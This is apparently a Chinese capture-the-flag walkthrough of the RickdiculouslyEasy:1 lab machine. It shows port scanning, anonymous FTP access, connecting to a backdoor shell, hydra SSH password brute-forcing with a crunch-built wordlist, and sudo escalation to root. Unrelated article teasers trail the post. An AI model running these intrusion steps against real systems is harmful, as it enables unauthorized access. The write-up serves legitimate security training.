红队打靶练习:RICKDICULOUSLYEASY: 1

news2024/11/15 10:50:26

目录

信息收集

1、arp

2、nmap

3、nikto

4、whatweb

目录探测

gobuster

dirsearch

WEB

get flag1

/robots.txt

FTP

get flag2

telenet登录

get flag3

get flag4

9090端口

get flag5

dirsearch

ssh登录

Summer用户

get flag6

信息收集

get flag7

get flag8

get flag9 and root

信息收集

1、arp
┌──(root㉿ru)-[~/kali/lianxi]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.1.46
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.47    08:00:27:bf:52:95       PCS Systemtechnik GmbH
192.168.1.9     30:03:c8:49:52:4d (42:f1:e2:49:51:a5)   CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.12    42:45:ab:5e:e9:ce (42:f1:e2:49:51:a5)   (Unknown: locally administered)
Ending arp-scan 1.10.0: 256 hosts scanned in 2.344 seconds (109.22 hosts/sec). 8 responded

2、nmap
端口探测

┌──(root㉿ru)-[~/kali/lianxi]
└─# nmap -p- 192.168.1.47 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-09 16:37 CST
Nmap scan report for 192.168.1.47
Host is up (0.0018s latency).
Not shown: 65528 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
9090/tcp  open  zeus-admin
13337/tcp open  unknown
22222/tcp open  easyengine
60000/tcp open  unknown
MAC Address: 08:00:27:BF:52:95 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.38 seconds

信息收集

┌──(root㉿ru)-[~/kali/lianxi]
└─# nmap -sC -sV -O -A -p 21,22,80,9090,13337,22222,60000 192.168.1.47 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-09 16:38 CST
Nmap scan report for 192.168.1.47
Host is up (0.00052s latency).

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.1.46
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              42 Aug 22  2017 FLAG.txt
|_drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
22/tcp    open  ssh?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
|   NULL:
|_    Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
80/tcp    open  http    Apache httpd 2.4.27 ((Fedora))
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.27 (Fedora)
|_http-title: Morty's Website
9090/tcp  open  http    Cockpit web service 161 or earlier
|_http-title: Did not follow redirect to https://192.168.1.47:9090/
13337/tcp open  unknown
| fingerprint-strings:
|   NULL:
|_    FLAG:{TheyFoundMyBackDoorMorty}-10Points
22222/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
|   2048 b4:11:56:7f:c0:36:96:7c:d0:99:dd:53:95:22:97:4f (RSA)
|   256 20:67:ed:d9:39:88:f9:ed:0d:af:8c:8e:8a:45:6e:0e (ECDSA)
|_  256 a6:84:fa:0f:df:e0:dc:e2:9a:2d:e7:13:3c:e7:50:a9 (ED25519)
60000/tcp open  unknown
|_drda-info: ERROR
| fingerprint-strings:
|   NULL, ibm-db2:
|_    Welcome to Ricks half baked reverse shell...
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.94SVN%I=7%D=1/9%Time=659D0610%P=x86_64-pc-linux-gnu%r(NU
SF:LL,42,"Welcome\x20to\x20Ubuntu\x2014\.04\.5\x20LTS\x20\(GNU/Linux\x204\
SF:.4\.0-31-generic\x20x86_64\)\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port13337-TCP:V=7.94SVN%I=7%D=1/9%Time=659D0610%P=x86_64-pc-linux-gnu%r
SF:(NULL,29,"FLAG:{TheyFoundMyBackDoorMorty}-10Points\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port60000-TCP:V=7.94SVN%I=7%D=1/9%Time=659D0616%P=x86_64-pc-linux-gnu%r
SF:(NULL,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20reverse\x20shell\.
SF:\.\.\n#\x20")%r(ibm-db2,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20
SF:reverse\x20shell\.\.\.\n#\x20");
MAC Address: 08:00:27:BF:52:95 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.52 ms 192.168.1.47

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.45 seconds

3、nikto
┌──(root㉿ru)-[~/kali/lianxi]
└─# nikto -h 192.168.1.47
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.1.47
+ Target Hostname:    192.168.1.47
+ Target Port:        80
+ Start Time:         2024-01-09 16:39:13 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.27 (Fedora)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Apache/2.4.27 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET, TRACE .
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /passwords/: Directory indexing found.
+ /passwords/: This might be interesting.
+ /icons/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8908 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2024-01-09 16:39:34 (GMT8) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

4、whatweb
┌──(root㉿ru)-[~/kali/lianxi]
└─# whatweb -v http://192.168.1.47
WhatWeb report for http://192.168.1.47
Status    : 200 OK
Title     : Morty's Website
IP        : 192.168.1.47
Country   : RESERVED, ZZ

Summary   : Apache[2.4.27], HTML5, HTTPServer[Fedora Linux][Apache/2.4.27 (Fedora)]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.27 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTML5 ]
        HTML version 5, detected by the doctype declaration


[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Fedora Linux
        String       : Apache/2.4.27 (Fedora) (from server string)

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Tue, 09 Jan 2024 08:39:50 GMT
        Server: Apache/2.4.27 (Fedora)
        Last-Modified: Mon, 21 Aug 2017 15:58:28 GMT
        ETag: "146-557458caf66e2"
        Accept-Ranges: bytes
        Content-Length: 326
        Connection: close
        Content-Type: text/html; charset=UTF-8

目录探测

gobuster
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.1.47 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.47
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/passwords            (Status: 301) [Size: 238] [--> http://192.168.1.47/passwords/]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

dirsearch
┌──(root㉿ru)-[~/kali/lianxi]
└─# dirsearch -u http://192.168.1.47 -e*
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/kali/lianxi/reports/http_192.168.1.47/_24-01-09_16-41-31.txt

Target: http://192.168.1.47/

[16:41:31] Starting:
[16:42:26] 301 -  238B  - /passwords  ->  http://192.168.1.47/passwords/
[16:42:26] 200 -    1KB - /passwords/
[16:42:30] 200 -  126B  - /robots.txt

Task Completed

WEB

get flag1






 得到密码:winter
/robots.txt
┌──(root㉿ru)-[~/kali/lianxi]
└─# curl http://192.168.1.47/robots.txt
They're Robots Morty! It's ok to shoot them! They're just Robots!

/cgi-bin/root_shell.cgi
/cgi-bin/tracertool.cgi
/cgi-bin/*




┌──(root㉿ru)-[~/kali/lianxi]
└─# cat user | grep "/home" | grep -v "nologin"
RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
Morty:x:1001:1001::/home/Morty:/bin/bash
Summer:x:1002:1002::/home/Summer:/bin/bash


┌──(root㉿ru)-[~/kali/lianxi]
└─# cat user.txt
RickSanchez
Morty
Summer

FTP

┌──(root㉿ru)-[~/kali/lianxi]
└─# ftp 192.168.1.47
Connected to 192.168.1.47.
220 (vsFTPd 3.0.3)
Name (192.168.1.47:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> binary
200 Switching to Binary mode.

ftp> ls -al
229 Entering Extended Passive Mode (|||49717|)
150 Here comes the directory listing.
drwxr-xr-x    3 0        0              33 Aug 22  2017 .
drwxr-xr-x    3 0        0              33 Aug 22  2017 ..
-rw-r--r--    1 0        0              42 Aug 22  2017 FLAG.txt
drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
226 Directory send OK.

ftp> get FLAG.txt
local: FLAG.txt remote: FLAG.txt
229 Entering Extended Passive Mode (|||11991|)
150 Opening BINARY mode data connection for FLAG.txt (42 bytes).
100% |******************************************************************************************************************************************************|    42       25.68 KiB/s    00:00 ETA
226 Transfer complete.
42 bytes received in 00:00 (13.86 KiB/s)

ftp> cd pub
250 Directory successfully changed.

ftp> ls -al
229 Entering Extended Passive Mode (|||24522|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        0               6 Feb 12  2017 .
drwxr-xr-x    3 0        0              33 Aug 22  2017 ..
226 Directory send OK.

get flag2
┌──(root㉿ru)-[~/kali/lianxi]
└─# cat FLAG.txt
FLAG{Whoa this is unexpected} - 10 Points


telenet登录

get flag3
┌──(root㉿ru)-[~/kali/lianxi]
└─# telnet 192.168.1.47 13337
Trying 192.168.1.47...
Connected to 192.168.1.47.
Escape character is '^]'.
FLAG:{TheyFoundMyBackDoorMorty}-10Points
Connection closed by foreign host.

get flag4
┌──(root㉿ru)-[~/kali/lianxi]
└─# telnet 192.168.1.47 60000
Trying 192.168.1.47...
Connected to 192.168.1.47.
Escape character is '^]'.
Welcome to Ricks half baked reverse shell...
# ls -al
FLAG.txt
# cat FLAG.txt
FLAG{Flip the pickle Morty!} - 10 Points
#

9090端口

get flag5


dirsearch
┌──(root㉿ru)-[~/kali/lianxi]
└─# dirsearch -u http://192.168.1.47:9090 -e* -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz
HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/kali/lianxi/reports/http_192.168.1.47_9090/_24-01-09_17-21-58.txt

Target: http://192.168.1.47:9090/

[17:21:58] Starting:
[17:22:25] 200 -  413B  - /favicon.ico
[17:22:39] 200 -   24B  - /ping

Task Completed

ssh登录

┌──(root㉿ru)-[~/kali/lianxi]
└─# hydra -L user.txt -P passwd ssh://192.168.1.47:22222
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-09 20:30:08
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:3/p:2), ~1 try per task
[DATA] attacking ssh://192.168.1.47:22222/
[22222][ssh] host: 192.168.1.47   login: Summer   password: winter
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-09 20:30:11

可以看到爆破成功!

login: Summer   password: winter


┌──(root㉿ru)-[~/kali/lianxi]
└─# ssh Summer@192.168.1.47 -p 22222
The authenticity of host '[192.168.1.47]:22222 ([192.168.1.47]:22222)' can't be established.
ED25519 key fingerprint is SHA256:RD+qmhxymhbL8Ul9bgsqlDNHrMGfOZAR77D3nqLNwTA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.1.47]:22222' (ED25519) to the list of known hosts.
Summer@192.168.1.47's password:
Last login: Wed Aug 23 19:20:29 2017 from 192.168.56.104
[Summer@localhost ~]$ ls
FLAG.txt

Summer用户
[Summer@localhost ThisDoesntContainAnyFlags]$ sudo -l

我们信任您已经从系统管理员那里了解了日常注意事项。
总结起来无外乎这三点:

    #1) 尊重别人的隐私。
    #2) 输入前要先考虑(后果和风险)。
    #3) 权力越大,责任越大。

[sudo] Summer 的密码:
对不起,用户 Summer 不能在 localhost 上运行 sudo。
[Summer@localhost ThisDoesntContainAnyFlags]$


此用户没有sudo权限!

[Summer@localhost home]$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/passwd
/usr/bin/su
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/newgrp
/usr/bin/newuidmap
/usr/bin/mount
/usr/bin/pkexec
/usr/bin/umount
/usr/bin/at
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/crontab
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/usernetctl
/usr/sbin/userhelper
/usr/sbin/mount.nfs
/usr/sbin/mtr
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/libexec/cockpit-session
/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
[Summer@localhost home]$

[Summer@localhost home]$ cat /etc/passwd
                         _
                        | \
                        | |
                        | |
   |\                   | |
  /, ~\                / /
 X     `-.....-------./ /
  ~-. ~  ~              |
     \             /    |
      \  /_     ___\   /
      | /\ ~~~~~   \  |
      | | \        || |
      | |\ \       || )
     (_/ (_/      ((_/

[Summer@localhost home]$ ls -al /etc/passwd /etc/shadow
-rw-r--r--. 1 root root 1428 8月  22 2017 /etc/passwd
----------. 1 root root 1205 8月  23 2017 /etc/shadow

 当我们使用cat的时候,就会出现猫咪,所有这个cat命令应该是被加入脚本中了!当我们使用cat时候,系统就会识别,从而显示猫咪的图案!
 
 我们使用more命令来代替!
 
 或者使用alias来暂时指定tail命令为cat
 
 alias cat='tail -n 100'
 
 
 [Summer@localhost RICKS_SAFE]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin

现在就可以使用cat命令啦!

get flag6
[Summer@localhost ~]$ more FLAG.txt
FLAG{Get off the high road Summer!} - 10 Points
[Summer@localhost ~]$

信息收集
[Summer@localhost home]$ cd RickSanchez/
[Summer@localhost RickSanchez]$ cd ThisDoesntContainAnyFlags/
[Summer@localhost ThisDoesntContainAnyFlags]$ ls -al
总用量 4
drwxrwxr-x. 2 RickSanchez RickSanchez  26 8月  18 2017 .
drwxr-xr-x. 4 RickSanchez RickSanchez 113 9月  21 2017 ..
-rw-rw-r--. 1 RickSanchez RickSanchez  95 8月  18 2017 NotAFlag.txt
[Summer@localhost ThisDoesntContainAnyFlags]$ more NotAFlag.txt
hhHHAaaaAAGgGAh. You totally fell for it... Classiiiigihhic.
But seriously this isn't a flag..

[Summer@localhost RICKS_SAFE]$ ./safe
-bash: ./safe: Permission denied
[Summer@localhost RICKS_SAFE]$
[Summer@localhost RICKS_SAFE]$ cp safe /tmp
[Summer@localhost RICKS_SAFE]$ /tmp/safe
Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!
[Summer@localhost RICKS_SAFE]$


下载到本地!


压缩包需要密码!

┌──(root㉿ru)-[~/kali/lianxi]
└─# strings Safe_Password.jpg | head -n 10
JFIF
Exif
8 The Safe Password: File: /home/Morty/journal.txt.zip. Password: Meeseek
8BIM
8BIM
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
        #3R
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
0D000D\DDDD\t\\\\\t

图片里藏着密码!

Meeseek

get flag7
┌──(root㉿ru)-[~/kali/lianxi]
└─# unzip journal.txt.zip
Archive:  journal.txt.zip
[journal.txt.zip] journal.txt password:
  inflating: journal.txt

┌──(root㉿ru)-[~/kali/lianxi]
└─# ls
FLAG.txt  journal.txt  journal.txt.zip  passwd  reports  Safe_Password.jpg  user  user.txt

┌──(root㉿ru)-[~/kali/lianxi]
└─# cat journal.txt
Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe?

Anyway. Here it is:

FLAG: {131333} - 20 Points


 到现在我们拿了80分了!还差40分!

get flag8
[Summer@localhost tmp]$ ./safe -u
decrypt:                                                                                                                                                                                                                                                                                                            7���
[Summer@localhost tmp]$

[Summer@localhost tmp]$ ./safe 131333
decrypt:        FLAG{And Awwwaaaaayyyy we Go!} - 20 Points

Ricks password hints:
 (This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order


1 uppercase character
1 digit
One of the words in my old bands name.� @


提示密码里里面一个大写字符,一个数字,其他的是旧团员的名称!

根据谷歌搜搜,以前的团队名称为The Flesh Curtains


我们可以用crunch生成字典!

┌──(root㉿ru)-[~/kali/lianxi]
└─# crunch 7 7 -t ,%Flesh > rick.txt;crunch 10 10 -t ,%Curtains >> pass
Crunch will now generate the following amount of data: 2080 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260
Crunch will now generate the following amount of data: 2860 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260

┌──(root㉿ru)-[~/kali/lianxi]
└─# cat pass | wc
    260     260    2860


hydra爆破名称就是RickSanchez


get flag9 and root
┌──(root㉿ru)-[~/kali/lianxi]
└─# hydra -l RickSanchez -P pass ssh://192.168.1.47:22222
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-09 22:30:26
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 260 login tries (l:1/p:260), ~17 tries per task
[DATA] attacking ssh://192.168.1.47:22222/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 117 to do in 00:01h, 13 active
[22222][ssh] host: 192.168.1.47   login: RickSanchez   password: P7Curtains
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-09 22:31:56

┌──(root㉿ru)-[~/kali/lianxi]
└─# ssh RickSanchez@192.168.1.47 -p 22222
RickSanchez@192.168.1.47's password:
Last failed login: Wed Jan 10 01:31:56 AEDT 2024 from 192.168.1.46 on ssh:notty
There were 189 failed login attempts since the last successful login.
Last login: Thu Sep 21 09:45:24 2017
[RickSanchez@localhost ~]$ ls
RICKS_SAFE  ThisDoesntContainAnyFlags
[RickSanchez@localhost ~]$ whoami
RickSanchez
[RickSanchez@localhost ~]$ sudo -l
[sudo] RickSanchez 的密码:
匹配 %2$s 上 %1$s 的默认条目:
    !visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION
    LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

用户 RickSanchez 可以在 localhost 上运行以下命令:
    (ALL) ALL


[RickSanchez@localhost ~]$ sudo /bin/bash
[root@localhost RickSanchez]# cd /root

[root@localhost ~]# ls
anaconda-ks.cfg  FLAG.txt

[root@localhost ~]# more FLAG.txt
FLAG: {Ionic Defibrillator} - 30 points

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1369657.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

学习笔记之——3D Gaussian Splatting及其在SLAM与自动驾驶上的应用调研

之前博客介绍了NeRF-SLAM,其中对于3D Gaussian Splatting没有太深入介绍。本博文对3D Gaussian Splatting相关的一些工作做调研。 学习笔记之——NeRF SLAM(基于神经辐射场的SLAM)-CSDN博客文章浏览阅读967次,点赞22次&#xff0…

CHS_01.1.4+操作系统体系结构 一

CHS_01.1.4操作系统体系结构 一 操作系统的体系结构 也就是操作系统的内核应该怎么设计这样一个问题操作系统的内核 在这个小节中 我们会学习 操作系统的体系结构 也就是操作系统的内核应该怎么设计这样一个问题 那这个小节的内容我们只需要做简要的了解就可以了 我们考试中常考…

GAMES101-Assignment4

一、问题总览 实现de Casteljau算法来绘制由4个控制点表示的Bzier曲线。需要修改main.cpp中的如下函数: bezier:该函数实现绘制Bzier曲线的功能。它使用一个控制点序列和一个OpenCV::Mat对象作为输入,没有返回值。它会使t在0到1的范围内进行…

Java中什么序列化?

在Java中,序列化是一种将对象转换为字节序列的机制,使得对象可以在网络上传输或存储到文件中,而后可以通过反序列化还原为对象。Java提供了java.io.Serializable接口,通过实现这个接口的类可以实现对象的序列化和反序列化。 序列…

翻译:Building Efficient RAG Systems: A Deep Dive into devv.ai

RAG 的全称是:Retrieval Augmented Generation(检索增强生成) 最初来源于 2020 年 Facebook 的一篇论文:Retrieval-Augmented Generation for Knowledge-Intensive NLP Tasks(是的,你没有看错,…

springboot学生综合测评系统源码和论文

随着信息化时代的到来,管理系统都趋向于智能化、系统化,学生综合测评系统也不例外,但目前国内仍都使用人工管理,学校规模越来越大,同时信息量也越来越庞大,人工管理显然已无法应对时代的变化,而…

将mask的图片标签转换为yolo的txt标签

将mask的图片标签转换为yolo的txt标签 获取外轮廓 import copy import cv2 import os import shutil import numpy as nppath "你的mask路径 /Dataset/mask" files os.listdir(path) for file in files:name file.split(.)[0]file_path os.path.join(path,name.…

市场复盘总结 20240109

仅用于记录当天的市场情况,用于统计交易策略的适用情况,以便程序回测 短线核心:不参与任何级别的调整,采用龙空龙模式 昨日主题投资 连板进级率 66% 二进三: 进级率低 最常用的二种方法: 方法一&#x…

阿里巴巴秋招前端笔试题

单选题 下面的 JSX 代码中&#xff0c;哪一个无法达到预期的效果&#xff1f; A.<h2>Hello World</h2> B.<input type”checkbox”/> C.<div class”msg-box”>{msg}</div> D.<label htmlFor”name”>Leo</label> E.div styl…

编码技巧(二) element-ui table中根据状态控制是否可以勾选

项目中使用element-ui时,表格中的数据有不同的状态,需要对某个状态的数据进行 勾选操作 如图所示: 只有id为12的符合条件可以进行勾选 <el-table-column type="selection" header-align="center" :selectable="selectable" align="c…

Excel:通过excel将表数据批量转换成SQL语句

这里有一张表《student》&#xff0c;里面有10条测试数据&#xff0c;现在将这10条测试数据自动生成 insert语句&#xff0c;去数据库 批量执行 P.S. 主要用到excel表格中的 CONCATENATE函数&#xff0c;将单元格里面的内容填入到sql里面对应的位置 1. 先写好一条insert语句&a…

U盘、硬盘无法打开,修复RAW磁盘或分区,硬盘变成raw格式如何恢复,数据恢复

本文持续更新&#xff0c;针对遇到的数据丢失问题进行详细记录 磁盘变成RAW的可能原因 突然断电或关机文件系统丢失或损坏病毒或恶意软件感染坏扇区磁盘损坏 以下解决方案针对非病毒损坏 通过Windows自带的工具进行恢复&#xff08;CHKDSK命令&#xff09; 1.连接硬盘 2.…

资产信息管理系统-前后端开发

题目要求&#xff1a; 资产管理系统 利用H5规范&#xff0c;CSS样式与JS脚本独立于HTML页面&#xff0c;Javascript调用jQuery库&#xff0c;CRUD后端使用FastAPI封装&#xff0c;前端页面在Nginx中运行&#xff0c;调用API模块&#xff0c; 实现CURD的课设总结 基本设计&am…

java: 5-4 while循环 + do while循环

文章目录 1. while循环1.1 基本语法1.2 流程图1.3 上手练习1.4 细节1.5 练习题 2. do while 循环2.1 基本语法2.2 流程图2.3 上手练习2.4 细节2.5 练习题 【老韩b站视频笔记p126-p132】 1. while循环 1.1 基本语法 1.2 流程图 1.3 上手练习 输出 10 句 你好,韩顺平教育。 pu…

MySQL之导入导出远程备份(详细讲解)

文章目录 一、Navicat导入导出二、mysqldump命令导入导出2.1导出2.2导入&#xff08;使用mysqldump导入 包含t_log表的整个数据库&#xff09; 三、LOAD DATA INFILE命令导入导出3.1设置;3.2导出3.3导入(使用单表数据导入load data infile的方式) 四、远程备份4.1导出4.2导入 一…

一个大场景下无线通信仿真架构思路(对比omnet与训练靶场)

2020年分析过omnet的源码&#xff0c;读了整整一年&#xff0c;读完之后收获不小&#xff0c;但是也遗憾的发现这个东西只适合实验室做研究的人用于协议的研发与测试&#xff0c;并不适合大场景&#xff08;军事游戏等&#xff09;的应用&#xff0c;因为其固有架构更侧重于每个…

国产系统-银河麒麟桌面版安装wps

0安装版本 系统版本 版本名称:银河麒麟桌面版操作系统V10(SP1) 软件版本 wps个人版2019 1双击安装 1.1卸载自带wps 为什么要卸载没有序列号,授权过期,不是免费的,通过先安装/在升级个人版跳过输入序列号问题等等原因 1.1.1当前自带的wps版本 1.1.2卸载 不卸载无法安装在…

盖子的c++小课堂——第二十三讲:背包问题

前言 又是一次漫长的更新&#xff08;我真不是故意的aaaaaaaaaaaaaaa&#xff09;&#xff0c;先不多说了&#xff0c;直接给我~坐下~说错了说错了&#xff0c;直接开始~ 背包问题----动态规划 背包问题&#xff08;knapsack problem&#xff09; 动态规划&#xff08;dyna…

2024年中国电子学会青少年编程等级考试安排的通知

各有关单位、全体考生: 中国电子学会青少年等级考试&#xff08;以下简称等级考试&#xff09;是中国电子学会为落实《全民科学素质行动规划纲要》&#xff0c;提升青少年电子信息科学素质水平而开展的社会化评价项目。等级考试自2011年启动以来&#xff0c;作为中国电子学会科…

【野火i.MX6ULL开发板】在MobaXterm平台利用Type-C线串口连接开发板

0、前言 参考文献&#xff1a; http://t.csdnimg.cn/9iRTm http://t.csdnimg.cn/Z0n60 问题&#xff1a;一直识别不出com口&#xff0c; 拟解决思路&#xff1a; 百度网盘重新下载Debian镜像&#xff0c;烧入full版镜像&#xff0c;随便换一下USB插口&#xff08;电脑主机上…